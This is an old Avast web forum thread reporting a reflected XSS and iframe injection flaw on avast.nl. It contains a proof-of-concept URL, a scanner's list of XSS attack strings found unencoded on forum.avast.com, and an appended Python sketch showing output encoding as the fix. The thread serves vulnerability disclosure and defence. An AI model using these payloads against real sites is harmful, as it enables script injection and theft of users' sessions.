Avast WEBforum

Other => General Topics => Topic started by: Methodman on May 31, 2009, 01:12:04 PM

Title: Avast.nl website -XSS & Iframe injection flaw
Post by: Methodman on May 31, 2009, 01:12:04 PM
POC
Code:
http://www.avast.nl/web/index.php?pageId=33&mode="><script>alert(String.fromCharCode(88,83,83))</script>

See some screenshots:
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/20090531_Avast___XSS.html
Title: Re: Avast.nl website -XSS & Iframe injection flaw
Post by: polonus on May 31, 2009, 03:44:56 PM
Hi Methodman,

Thanks for reporting, but there is more here: unnamed form::search - found unencoded:
Code:
; \ / ' = Security Compass Logo
Test Results
XSS Heuristic Test Results
    ;   \   /   <   >   "   '   =

Warnings:

Results:
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT <B>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC=" &#14; javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="jav ascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

Results generated on May 31, 2009 for hxtp://forum.avast.com/index.php?action=p*

There is an awful lot of penetration testing left to do online; that is why we have so many online threats going on.

polonus

P.S. If I use the script in a query, Firekeeper flags that in Firefox, glad to have Firekeeper for this....
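Added by the editor, not code from either post: a small Python model of the attribute-context reflection the PoC relies on, beside the output encoding that closes it, using the probe strings quoted in the thread. The TEMPLATE is a hypothetical stand-in for the affected page, and the parse step goes beyond the tool's verbatim string match to show which rendering actually introduces a tag.

```python
import html
from html.parser import HTMLParser

# Constructed sample input taken from the thread: the PoC parameter value from
# the first post and two of the "tested values" from the second post.
PROBES = [
    '"><script>alert(String.fromCharCode(88,83,83))</script>',
    '<SCRIPT>document.vulnerable=true;</SCRIPT>',
    '<IMG SRC="javascript:document.vulnerable=true;">',
]

# Hypothetical stand-in for the vulnerable page: the request parameter is
# reflected inside a double-quoted attribute, the context '">' breaks out of.
TEMPLATE = '<input type="hidden" name="mode" value="{value}">'

def render_unescaped(value: str) -> str:
    # Weak behaviour: reflect the parameter verbatim.
    return TEMPLATE.format(value=value)

def render_escaped(value: str) -> str:
    # Fix: entity-encode & < > " ' before reflecting. The other characters in
    # the tool's list (; \ / =) are inert inside a quoted attribute value.
    return TEMPLATE.format(value=html.escape(value, quote=True))

def found_unencoded(page: str, probe: str) -> bool:
    # The check the tool output reports on: is the tested value present verbatim?
    return probe in page

class _TagCollector(HTMLParser):
    # Records start tags the way a browser tokenizer would see them.
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)

def start_tags(page: str) -> list:
    # Parse the page; an injected <script> shows up as an extra start tag.
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags

def audit(probe: str) -> dict:
    # Side-by-side result for one probe: weak rendering vs. fixed rendering.
    weak, fixed = render_unescaped(probe), render_escaped(probe)
    return {"weak_verbatim": found_unencoded(weak, probe), "weak_tags": start_tags(weak),
            "fixed_verbatim": found_unencoded(fixed, probe), "fixed_tags": start_tags(fixed)}
```

Note that the second and third probes are reported verbatim by the string match yet add no tag in this attribute context; the string match is context-blind, which is why the escaped rendering is the reliable fix rather than filtering individual probes.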